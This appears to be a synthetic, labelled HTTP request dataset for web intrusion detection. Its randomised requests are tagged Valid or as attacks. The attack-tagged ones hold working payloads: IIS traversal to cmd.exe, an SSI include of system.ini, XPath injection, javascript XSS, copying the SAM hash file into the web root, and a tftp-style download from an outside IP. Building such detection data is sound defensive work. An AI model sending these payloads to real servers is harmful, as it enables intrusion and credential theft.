Date: Tue, 18 Dec 07 21:52:27 UTC
ETag: W/"CHJemz4YjAijP7F-"
Expect: aAnouo=shoba
From: eswp2a@SmynxY.com
If-Modified-Since: Mon, 13 Sep 04 01:01:15 CET
If-Unmodified-Since: Thu, 13 Aug 09 14:03:15 CET
If-Match: "vSzENbh5ftNEzoI60la"
If-None-Match: *
If-Range: Tue, 20 Mar 07 13:49:12 GMT
Max-Forwards: 0291
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic Zm5vdWE6b3R4dHM=
Authorization: NTLM a2Q0c3I0ZVVvZW5tZ0VvcWFyaWluc2RzdW8xdHdlbmg2
Range: 45-17033,2056-83
Referer: http://jTWilbua.fr/oleaeh/O3tqnheg.mpeg
TE: trailers,chunked;q=0.0,deflate;q=0.6
Trailer: From
User-Agent: ah9gYb8U58 http://www.Piila.de
UA-CPU: x86
UA-Disp: 185,098,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 992x6329
Via: 2.9 www.rwnbteo.css, 0.8 www.awgeRyS.jpg, 9.4 98.14.251.74
Transfer-Encoding: deflate
Upgrade: skn/0.2, ttri5f/7.5, Xl2hi/6.4, lre/8.6
Warning: 183 2.31.82.140 "EmePDtapnntrh" "Wed, 06 Jun 07 03:28:08 UTC"
X-Forwarded-For: 250.149.217.157
X-Serial-Number: 82100256836
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13183
Start - Id: 44022
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 214.36.90.52:80
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936, iso-8859-5
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="698"
Date: Sun, 26 Jul 09 23:35:50 GMT
ETag: "Ulw7dIb1rT0S2qp-n1I"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 03 Oct 06 01:18:37 UTC
If-Unmodified-Since: Mon, 16 Oct 06 20:31:09 CET
If-Match: *
If-None-Match: *
If-Range: "pIOhWw@_Wr1M5qY"
Max-Forwards: 936
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXNEZnNoaXNvYTBkZjFwdG5hc25xY2dBdGN0dGhzNE5ldWluZmxwTw==
Authorization: rpirso 5hnrkEa=t0ebst
Range: 67-764741,470518-20,3-202913
Referer: /tsnez/anlatib/u6gtktrr/Uhey.gif
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: Mozilla/2.2 (Windows; U; Windows NT 0.6; Ee-D2; rv:0.5.8) Gecko/77617165
UA-CPU: PowerPC
UA-Disp: 696,2974,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: HTTP/8.2 4.81.50.227
Transfer-Encoding: compress
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44022
Start - Id: 26387
class: Valid
GET /dyDhwlfREalf8h/lP5TI/rtWBEsjpm/8L/zYFHVSK/z1dlh7rerAsi/oor6dhelztiereecy0tt/oGXf/tsEAd8btmsnfrawD/jaNnlebpettytdEgdhsq/pwxEQDhK3SI1mMgV/XbUI8P@Copm4p.cfm?uahfah8=teO7D&ayenTeory3md8p=89815&eekh=dho&.JcfbWjboot.ini8K.s=lyoo%40&zedqzsammL=naRUrbhdLhtvho9w1x&etisecktse1s5D=esac6uytLneCa&ttWh=7546400&stfpNoyuaemtcte=0&eorme9hst=8432387&ejn=tV%405_&6TehnnennSae9bp=0649150&rr=tfrTVehttpsvbscripth3oqconnectl+&iisrewfi3i1r=hqm7yyK3zR&sonehi=admind&i9i18rye=qe HTTP/1.0
Host: 122.0.253.45:362
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=60
Client-ip: 1.175.59.116
Cookie: 13ra=7957;oiao=siadusr;eNnt=it
Cookie2: $Version="05"
Date: Thu, 19 Oct 06 09:17:54 CET
ETag: W/"j8l-cMXG-Xolo6KfB0"
Expect: hmlba=Tduw
From: 8u9Mo@enowovqeu.com
If-Modified-Since: Fri, 08 May 09 06:43:52 CET
If-Unmodified-Since: Sun, 25 Mar 07 21:48:42 GMT
If-Match: "Qh2DauFmPgJdr4D"
If-None-Match: *
If-Range: *
Max-Forwards: 4821
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="hehs"
Authorization: Digest uri=/qktR8ioh/Dws25d/13anmo8D/Muorp.asp
Range: -954249,93-21781,60217-
Referer: http://otiateto.biz/nEan/equhlni/itrstma.mpeg
TE: trailers,deflate;q=0.6
Trailer: Pragma
User-Agent: Mozilla/2.8 (X11; U; Linux i386 4.0; nr-sg; rv:3.5.0) Gecko/71885863
UA-CPU: StrongARM
UA-Disp: 146,5965,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5346x326
Via: 2.8 www.ehAe7few.js
Transfer-Encoding: gzip
Upgrade: Yoanr/1.5, vNn/4.7, 7loa/0.1, nab9I/9.9, ale/2.7
Warning: 718 37.84.139.178 "edSoh8ruFnusxg4s" "Wed, 25 Feb 04 22:44:53 GMT"
X-Forwarded-For: 21.229.165.135
X-Serial-Number: 7631325909856
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26387
Start - Id: 42988
class: OsCommanding
GET /eam/iIE6k5gC8r/ieezim9lwE/teTweRnetSna/tHeicahc0aWEd0crnou.nsf?CE.WxOautoexecmz=4utouwT7bf&tneeemsiag=hpewnRtsi&iTbmMnde=4078&o81unbtksaaao=e&nrdwapa158aLl=6toc%3AoG&diagal=kxp&Itmp_5=T+t9&we6Gelhodhyh=958&ht=vGdwdhU&Ewhlfofhq0awbs=winnt7fi1o HTTP/1.0
Host: www.ocgT.biz
Connection: turntwn
Accept: audio/x-wav;q=0.7, image/gif
Accept-Charset: hz-gb-2312;q=0.5, hz-gb-2312;q=0.8, x-mac-japanese
Accept-Encoding: 
Accept-Language: t-oEuin;q=0.3, en2irMiN-sunwsr;q=0.4, reet-kleoae;q=0.0
Cookie: 7wf==5yuboot.ini;te=' ;uftp    -g     /home/toet/ladenste    56.33.242.200    /nsnd     ;;hsmcjqfooepgl=5;dr=bEpyzEsb
Date: Sun, 13 Jul 08 15:07:21 CET
If-Modified-Since: Sat, 14 Jan 06 08:12:03 CET
If-Unmodified-Since: Thu, 01 Mar 07 04:13:49 UTC
Proxy-Authorization: Basic ZVRmaHJuaWQ6Y2F0cnZvMHk=
Authorization: ne5e 7Tifd=itO9ne
Referer: /oridlskt/etlETdh/szeel/eteo/1oecdtf.jpeg
User-Agent: 2nKS3gyXCQ http://www.eaekjtn.net
UA-Disp: 0159,4616,16
Via: 8.4 165.76.213.178, 0.0 22.251.188.61, Ukor/0.8 www.auonl.js
Transfer-Encoding: jvatia; iIwvat=n2rtanm
Upgrade: ncne/4.6, sNsieo/1.8, oafee/3.1

null

End - Id: 42988
Start - Id: 4334
class: Valid
POST /06bkwl_I-Pp26tthZ/aW_On/r0aNvkBcTE.M.toS/yfE8ayPIZfgTRP.mdb? HTTP/1.1
Content-Length: 180
Content-Language: 4ehErl,rl8ru,tnhttg3p
Content-Encoding: gzip
Content-Location: /4s6ipcwt/Eneian/Enthas/h5al.gz
Content-MD5: YjhhdWd3NXVlaXRjbk1pVA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Apr 09 05:59:42 GMT
Last-Modified: Sat, 16 Oct 04 17:14:16 CET
Host: 244.99.15.73
Connection: 8erlnm
Accept: */*
Accept-Charset: euc-kr, x-mac-greek;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 67.250.58.132
Cookie: Zw3iconnectPPuItf9=141;4obhne=5378
Cookie2: $Version="10"
Date: Fri, 07 May 04 05:56:28 GMT
ETag: W/"GXGK-.REYw4zTvKw"
Expect: 100-continue
From: 5soaa@eElhadti.fr
If-Modified-Since: Sat, 27 Nov 04 07:17:53 UTC
If-Unmodified-Since: Wed, 15 Mar 06 08:56:56 CET
If-Match: "NNyXPQZ3kk7Ktm4j3"
If-None-Match: *
If-Range: Sun, 24 May 09 01:53:04 CET
Max-Forwards: 22
MIME-Version: 1.7
Pragma: aa='Er0en6'
Proxy-Authorization: Digest nonce
Authorization: NTLM Q1RvcDZzYW9ucWJkZWduaGVheXRjZldldHN1Z2VmYXRvaWVlaQ==
Range: 45370-03,2-266951,-79688
Referer: http://aiGssi.org/ohR4et/m2le/wc2u2r.gif
TE: deflate
Trailer: Trailer
User-Agent: ewVcq-yR4h http://www.edeu1nsi.cz
UA-CPU: x86
UA-Disp: 9274,388,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8501x1867
Via: tra/1.5 141.162.17.48
Transfer-Encoding: deflate
Upgrade: esgn/6.8, ei1l/5.1, redat/5.0, 10g/8.4
Warning: 980 www.Rrmnetut.css:6 "sOlpsziur" "Wed, 25 Mar 09 01:43:09 GMT"
X-Forwarded-For: 184.207.120.162
X-Serial-Number: 936770860
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oNba5e=62060875&jsr=we&yta=iisn&a8de0gioee=5&nunmhNdiitk=52954&k3t=0lSe&xalcsvOohs=3RqN2Yj&6idginoNr=o4wN6_nSFXd&RICzvarK=oxtermuvgu&Ekaemlc9S=a2&itOOm3aMaryrnp=eeUino?a/eroti5

End - Id: 4334
Start - Id: 27453
class: Valid
GET /nsf9Krwc/4b3RLZ/hqx8yehneer/am8MTsCcLX/nPIZLDENysxaU8adc4tv.jpeg?aao=lOr&tLi0ree=677339&et2HntuonT5nia=0711439&_etceTK=s+llpbLShDrsls&rcbe=g%405tqb6&gAnoT=tdsyxeaspui&-mHVAJcopy6_vWP=arhrheDe&sns=c3is&pRegn0ea=%7Ck%3Det4c%5Bform%28r2&x7gC=renipasswdS+he&JZ9xJhR=h%5DltcYm8body%3A+&7DgertbtHfr8lx=0&oln=9&AdrdyTrsh=ftpexphp HTTP/1.1
Host: 162.106.52.159
Connection: close
Accept: image/gif;q=0.6
Accept-Charset: *
Accept-Encoding: identity, compress, gzip, gzip, gzip
Accept-Language: ieezejet-trer79e;q=0.3
Cache-Control: no-cache
Client-ip: 213.169.24.78
Cookie: amrl=2190267540;3RU7o9v=child26Oea9v;ZaOf6tn=ndxh;ie3rdatrcAofEhn=4<a9Orlmmtmpz7;1tlbersojtlzi6=07
Cookie2: $Version="3"
Date: Tue, 10 Nov 09 17:09:46 UTC
ETag: W/"2kkRZ492X1WEmOgz"
Expect: coouoR
From: dnrbtain@sp0oh1f.net
If-Modified-Since: Fri, 27 Mar 09 01:55:15 UTC
If-Unmodified-Since: Thu, 31 Aug 06 04:35:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 72
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: NTLM dXRlZHduZW51Z2NybUszdW5vYWJ0c25yYWF4eWFyb2U=
Authorization: Digest username="am7A"
Range: -23882,10-10,-10053
Referer: http://www.cAoLC.cz/enreeud.wav
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/3.2 (X11; U; Open BSD i586 9.3; he-34; rv:2.0.5) Gecko/89204494
UA-CPU: StrongARM
UA-Disp: 2797,148,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 802x162
Via: 8.8 www.y1fcl.jpeg, iCsi4t/8.6 204.55.64.243:334, 3.4 www.amromNIe.css
Transfer-Encoding: qbs9o
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 71071615969288398
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27453
Start - Id: 40506
class: SSI
GET /XRdrmd@-.sh?botnonltnNg=%3C%21--+++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&i7tNlsetNjndt5u=oXkPZR7 HTTP/1.1
Host: 35.128.158.230
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, cp-936;q=0.5
Accept-Encoding: *
Accept-Language: eesr-Ewecuo;q=0.9, a-snSsiEla, lltrc-ziS;q=0.2, t-9nsataqa
Cache-Control: no-store
Client-ip: 68.175.116.43
Cookie: JcD74PnX2k=15052538;hoHce=inaN9$e q(ecdh
Cookie2: $Version="510"
Date: Mon, 17 Nov 08 13:45:00 UTC
ETag: W/"k5QWemeMMlDKpQQIF@"
Expect: 100-continue
From: pe1n3lw@grPaOzeer.st
If-Modified-Since: Mon, 02 Oct 06 12:27:45 GMT
If-Unmodified-Since: Wed, 15 Mar 06 14:44:04 CET
If-Match: "EYkpkG5@0zzImPxKp_"
If-None-Match: *
If-Range: "3jSV2W8X@hnqc1@tkw"
Max-Forwards: 14
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM RWV0b1dIcmVlbkZoZnJyc3RwRGFSM3JobmN1ZW54aUFlbml4NTZodE9waWw=
Authorization: rloeC ro5fte9s=nfeswo
Range: 049-19497,328865-,-538
Referer: http://www.he6AT.st/demue/tsorkoc/njmtnp.rar
TE: chunked,chunked,gzip
Trailer: Accept-Language
User-Agent: amrain (mCT24PnfRc; c.Q.7C6)
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 278x2627
Via: iucnS/0.9 www.ln4tss3.jpeg
Transfer-Encoding: identity
Upgrade: stscth/0.9, onhEnx/5.9, pp0sG/4.5, we6h/6.0, dwhd/5.7
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 7235239060397255727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40506
Start - Id: 48507
class: XPathInjection
PUT /ufnfaeu7pr2dbn2hXoeh/Heiw4eep/oJH/e95eithwhfEsnSSand/hi/0KJscriptintcetc9JIdI.jpg? HTTP/1.0
Content-Length: 305
Content-Language: ii,yn,oesihnnp
Content-Encoding: deflate
Content-Location: http://www.Hrttee.fr/iitp/Rr4rn0rr/hniepmxn.php
Content-MD5: aHU0c3I4ZW5zb2Fhbnk4ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Nov 09 03:20:28 CET
Last-Modified: Sun, 24 Apr 05 15:58:18 UTC
Host: 44.174.237.58
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: pkS-a;q=0.3
Cache-Control: min-fresh=157
Client-ip: 117.212.24.161
Cookie: eranartRosh59sp=ypeS;mlmsii1sotet=eGX1bsn;oieexusohs=919;HHRjk79ekAxQ=5eR;2trTrit;pdTtp=inhaetp<cxD
Cookie2: $Version="2"
Date: Sat, 11 Aug 07 22:29:02 CET
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: medziZgs=din4
From: 3eaqc@eaed.ch
If-Modified-Since: Tue, 21 Oct 08 18:57:20 CET
If-Unmodified-Since: Fri, 23 Sep 05 20:28:04 UTC
If-Match: *
If-None-Match: ".bYgv1BA4ZQP4n5M"
If-Range: Mon, 12 Jul 04 10:54:36 CET
Max-Forwards: 65
MIME-Version: 4.9
Pragma: no-cache
Authorization: Basic cml0aGU6c2tvcnl4b3I=
Range: 50804-188288,858386-
Referer: http://www.ctwEodl.net/Ehytxhqr.jpeg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.4 (Machintosh; U; PPC 5.0; ar-s8; rv:0.2.4) Gecko/23221584
Via: FTP/5.9 2.174.8.152, 3eaoo/2.4 23.210.233.175
Transfer-Encoding: compress
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 01871
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

auqh=k-3O3nPcho_&Is6vhsef22waeor=8139&afgtel3k2=window.openpi7mochaloetoU0s)n&cedo8=6892775306&SOKz41bBFaK=Piwhhtihdla&7dsc=k_IMEDEMV3pJ&neone=w oeib$aErv&r6=y/cais/n/child::node()[position()=36] or   'cu5tsd8' =  '&tik=Sax&g2=26&oestiqueet=a&vntilTort=5364&c3asy=ij>

End - Id: 48507
Start - Id: 28608
class: Valid
GET /i1eese1wtqyo/wNbegcceqsc1viexcd2l/-GMKZLusrfhATn5/ayd/lQRL6zVoQ0bVD/yCHmer8i/vJe-/lnHsmKst9.jpg?w8_f2=p%7Cou&uhyilioalnrls=areautoexec5j4oIh&beawoitoisps=nd6&e5_ZolePNZ=olrcisameihedrop+i2ydaela&nd1hsiaOes=e9iGir&eh5mwT7htc=932&kt=erephrps&aSswdheor4KaoI=it&G0dDweOIxn.w8=hqo0gD66q&anumbtdkob=in&dasSeaye=e5ys.3p&nijn=9053908 HTTP/1.0
Host: 188.242.114.5:78
Connection: a4tdxeno
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: tctwdo=lds
Client-ip: 238.73.19.115
Cookie: e7eqoayddEt=8mjdrcp0a@e;ao=053;uonfttn=79;2srI2hisi=5395839090;q0WOOfAOl19.=588
Cookie2: $Version="47"
Date: Sat, 05 Sep 09 04:15:46 GMT
ETag: ".W7n3UVg9XM_tMydIr"
Expect: dsaq
From: i3ltd@nsmTrto.cz
If-Modified-Since: Mon, 01 Feb 10 21:28:01 GMT
If-Unmodified-Since: Wed, 20 Jan 10 24:01:54 UTC
If-Match: "B44sQc4HiPuLC1I96O"
If-None-Match: *
If-Range: Tue, 07 Mar 06 06:57:03 GMT
Max-Forwards: 15
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="nteit8ao"
Authorization: iyyo xaOvoHe=acw0ep
Range: 4-8144
Referer: /qOraemy/29sndrf/2bge/wfnoarsW.wmn
TE: trailers
Trailer: Accept
User-Agent: Mozilla/4.3 (Windows; U; WinNT 4.7; ae-nf; rv:6.5.1) Gecko/71418354
UA-CPU: MIPS
UA-Disp: 224,8180,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 379x210
Via: FTP/7.6 www.t7Lu.css:11
Transfer-Encoding: compress
Upgrade: Crnst/6.4
Warning: 313 www.acau.html "bckduh" "Wed, 09 Sep 09 19:22:50 CET"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 408007712667220
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28608
Start - Id: 16059
class: Valid
GET /4Yr8Mrcathh8lHaAz/sY2HSkw/Oneetwtdtohnedthnn4e/uX7xc/eDw.oe/dG15dT/ziiOb/bWAAhu5Med/oneefarleyiragmERDg/dhZtmpwdZMtsQTLtmp.asp?Ee=eroieILsi8be15iiem&b5zctKsv7cp=cfioCu&tld=inHAOZ1&hls=45 HTTP/1.0
Host: www.hsieecgbn.de:80
Connection: hrun
Accept: image/gif
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 194.90.13.125
Cookie: 3ee7atcu=n;Jn420aO2c5EE=totmo@Fi;DKE3=5278
Cookie2: $Version="7"
Date: Mon, 11 Sep 06 02:14:07 CET
ETag: "TAeqn8RuxKncBO-M7gv"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Sun, 23 Oct 05 15:23:42 UTC
If-Unmodified-Since: Sun, 17 Dec 06 22:25:25 UTC
If-Match: *
If-None-Match: "bj9AHG6gYP3Whdu42PKi"
If-Range: Fri, 25 Nov 05 06:00:29 CET
Max-Forwards: 8967
MIME-Version: 5.7
Pragma: thrc=l
Proxy-Authorization: Digest opaque="neh7g"
Authorization: vimeh7 RSprR9e=6cnYteum
Range: 027-,-7
Referer: http://hRateet.gov/roooys.dll
TE: trailers
Trailer: Via
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 2.4; sf-o0; rv:8.7.1) Gecko/51474460
UA-CPU: MIPS
UA-Disp: 738,0570,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 973x791
Via: HTTP/7.6 www.hat1aax.htm, FTP/0.5 151.211.145.101:48
Transfer-Encoding: he6ww; sjigfccs=o6dnt
Upgrade: erd2c/3.3, ohn/2.9
Warning: 434 21.156.106.72 "eo6ow" "Fri, 28 Oct 05 11:38:33 CET"
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 552884692848315440
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16059
Start - Id: 47910
class: XSS
GET /isPihna0ioyreti7ahtl/sGpTxt3mRu72qL/ldov/EPcoseJlhuBtata7tchz/52zQ/a97heee/dUWkus.5T/c9p0_JtBowrx/fXI57p/0F/mWmNH7/o991BZZFj.shtml?0echokDF7htacces=5519404&LqZ4iVWZ@=taccess_log%25uee&ero34fqneeis0o=ihajo&eeArr=21&prrmdhtuAseroAO=oN6&kehs8yvh1yt1W=60673&pnsxsnstNam73ev=70&eiohondnxinE=%3Clink+++rel+%3D+%22stylesheet++%22+++++href+%3D++++%22+javascript%3A+++%5Balert++++%28%27bonheei1P%27%29%3B%5D++++%22+++%3E HTTP/1.0
Host: www.rs5efN.biz
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255;q=0.3, cp-932, iso-2022-jp;q=0.9, windows-1252
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 93.12.193.202
Cookie: Rktneo5azb=z;ecelrdeji0o6osC=t5ea7dU1p;oealOtscd9t5=oftuk64guaatyexeno;tT=allychildma
Cookie2: $Version="6"
Date: Mon, 20 Mar 06 23:59:03 UTC
ETag: "ifdVZPaP60cBTA8HNdjF"
Expect: ststi=La4tm;napsfnLs
From: rigu@deao.net
If-Modified-Since: Sat, 21 Mar 09 13:22:19 UTC
If-Unmodified-Since: Sat, 13 Aug 05 06:40:41 GMT
If-Match: "T9_Qd8iIpYqOkC3m"
If-None-Match: "kF-F9w5nbD2A0l1"
If-Range: Wed, 11 Mar 09 14:42:11 GMT
Max-Forwards: 3
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: NTLM bmxtaWhiZTRsYW93aGx0bm95bXJpSWFuZW5SeWU2d240bnJuZTUzQ1Z0dGpIY3Uy
Range: -419,3-
Referer: /teeam/urjtafi/emTenhn/rheeslh.shtml
TE: gzip,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 4.8; ze-m7; rv:2.6.2) Gecko/92762185
UA-CPU: x86
UA-Disp: 1161,524,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: 2.8 www.lsffikew.jpeg, 1eefe/4.1 www.A89m.gif, HTTP/9.0 217.16.173.81
Transfer-Encoding: nipm
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47910
Start - Id: 1603
class: Valid
GET /2Y.@SeXXG449-/alisga/wKYD/nBFUJOczisKVeH6YY9T/ijTMA3Wk/yiddh/_Ly/0A/tA/o3br5lla.pl?tlhnszfetshi=5551540&AYGv7OXsam=%29edcat&vatfl=ayCea%7C&ylETawe5okeir=dxl+e&igdonp9nfigno=%29d1o&sohhthrkeos3jh=t%26e&8SS4CGpa8vYO=3462118&anOd=SRl6rreFd9e HTTP/1.0
Host: www.sehecl29.st:52318
Connection: ae0rVs
Accept: audio/basic;q=0.1, video/*;q=0.0
Accept-Charset: big5, utf-8, euc-tw, x-mac-icelandic, x-mac-chinesetrad
Accept-Encoding: deflate;q=0.3, identity;q=0.5, gzip
Accept-Language: *
Cache-Control: no-cache
Date: Fri, 27 Oct 06 15:50:16 GMT
ETag: W/"6cpkX8A2dmE5vzI0gZEY"
Expect: htgyeTda=7lepHAh;eskh
From: wute@hrddbhn.uk
If-Modified-Since: Mon, 29 Sep 08 16:28:35 GMT
If-Match: *
If-None-Match: "zlMp1h76UvQ3OCR"
If-Range: "z5OEQeq_T8m@wr-CZ-"
Max-Forwards: 6198
Proxy-Authorization: Basic c2lFenI6eHR0bGVlYQ==
Referer: http://f3x523na.uk/tusla/pe6r5/Jfala/3tsmria.ace
User-Agent: Mozilla/9.8 (X11; U; Linux i586 7.5; po-iD; rv:6.6.7) Gecko/97520220
Via: teev/3.6 www.mRiEsc.jpeg
Transfer-Encoding: 1atpm; fne8=htamsoul
Upgrade: sTSZ/4.6, yc0et/6.6
Warning: 694 254.66.88.83:7 "ithrnim0obb5iieHN" "Wed, 17 Aug 05 12:23:04 GMT"

null

End - Id: 1603
Start - Id: 35872
class: XPathInjection
GET /3WtW5R/xad/axwCi5vxLNg.Q2.js?eu8fIthctNhov6l=614322&eIbPcaeelryw=5665709&enLitsacintwe=ta&uor9fraheLrLct=oso%26hs7ne&5a=etor%27+or+++6++++%3C+++count%28path%2Fchild%3A%3A*%29+++or+++++%27uOcaesae%27++%3D++++%27&nuen=n0ezg%297qm8horr%5C%3D+si HTTP/1.0
Host: 252.195.10.225:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: ks_c_5601-1987, euc-jp;q=0.9, x-mac-chinesetrad, euc-cn;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=3980
Client-ip: 167.85.209.229
Cookie: 5tEwehBBL=25975;kyd2JByaX=800840;Z-._9e_.=Shatih3u4tot4t9a;sght0evCtId=enbin(uc8;olioeest=nwbrCXZmCyiv
Date: Thu, 20 May 04 24:12:07 CET
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: d49tka@erigitaa.biz
If-Modified-Since: Thu, 11 Mar 04 03:50:24 UTC
If-Unmodified-Since: Sat, 03 Mar 07 02:13:37 UTC
If-Match: "j6Rux0wYcW_xhFcn"
If-None-Match: *
If-Range: *
Max-Forwards: 524
MIME-Version: 4.5
Pragma: h='HpaFmr'
Proxy-Authorization: Digest nonce
Authorization: dcxnx vuow=u1e0
Range: 440415-33194,1644-5
Referer: http://www.yepw.net/9nb46r.dll
Trailer: If-Match
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 0.6; er-yt; rv:8.7.3) Gecko/61331255
Via: 3.2 20.147.36.45, osrg/8.2 www.ts3eei58.html
Transfer-Encoding: AEnWe; ysiITcwr=esret
Upgrade: hic/2.2, m8rwk1/9.9
Warning: 683 214.32.116.161 "fdrit" "Thu, 11 Jun 09 24:41:37 GMT"
X-Serial-Number: 160475

null

End - Id: 35872
Start - Id: 42817
class: OsCommanding
POST /aj6l.IWe3o6MB9SH/nAsvhabnif9bldhCsoh/c_yqhBFRwdveRM/Pw-group by7echolocation/qKYJqjWGRmbeJ6n/-qYu2stdinyD.aspx? HTTP/1.0
Content-Length: 169
Content-Language: qptttm,j8,h2ddw
Content-Encoding: identity
Content-Location: http://www.enojekdd.st/ce5if/8gdO/tNoGesC/sSldoC.png
Content-MD5: dWVlZXBSc3plbWV0RTllcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Jun 09 14:16:13 UTC
Last-Modified: Wed, 23 May 07 02:23:16 GMT
Host: 109.255.10.129:548
Connection: close
Accept: image/*
Accept-Charset: euc-cn;q=0.0, ks_c_5601-1987, cp-932;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=829
Client-ip: 85.139.43.62
Cookie: Ndmv=r;tyrohzc=iptvvyu
Cookie2: $Version="5"
Date: Tue, 16 Mar 04 06:08:49 UTC
ETag: "5ZPilOmFYaosnwTxq"
If-Modified-Since: Fri, 18 Mar 05 05:04:36 UTC
If-Unmodified-Since: Tue, 18 Aug 09 19:48:14 GMT
If-Match: "6bF0IQfhDB1snwg4c-7"
If-None-Match: "DCbs8O6ffKpmP88g"
If-Range: *
Max-Forwards: 9400
Pragma: gNl=eeior
Proxy-Authorization: Digest nonce
Authorization: Basic Zm40ZXJ5YTpldGVlZWR1YQ==
Referer: /fletsaej/cbk3h/mhpbtnio/owtu.msf
User-Agent: Mozilla/0.6 (X11; U; Linux i586 9.1; sw-pe; rv:0.5.0) Gecko/88942298
UA-Pixels: 0367x479
Via: dnod/4.5 239.147.85.240:119, 1.0 www.1my6a.tiff
Transfer-Encoding: identity
X-Forwarded-For: 95.96.130.184
X-Serial-Number: 328285479278468
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

1tEjE=7SR&rrvh=ms8rrae9&ifh3=HN4gyoud&ii1ahusu=o&Rtaeh=165.129.77.90    |  copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam.ddd&2fGwNEa-A=mtEG64MrZeqG

End - Id: 42817
Start - Id: 22103
class: Valid
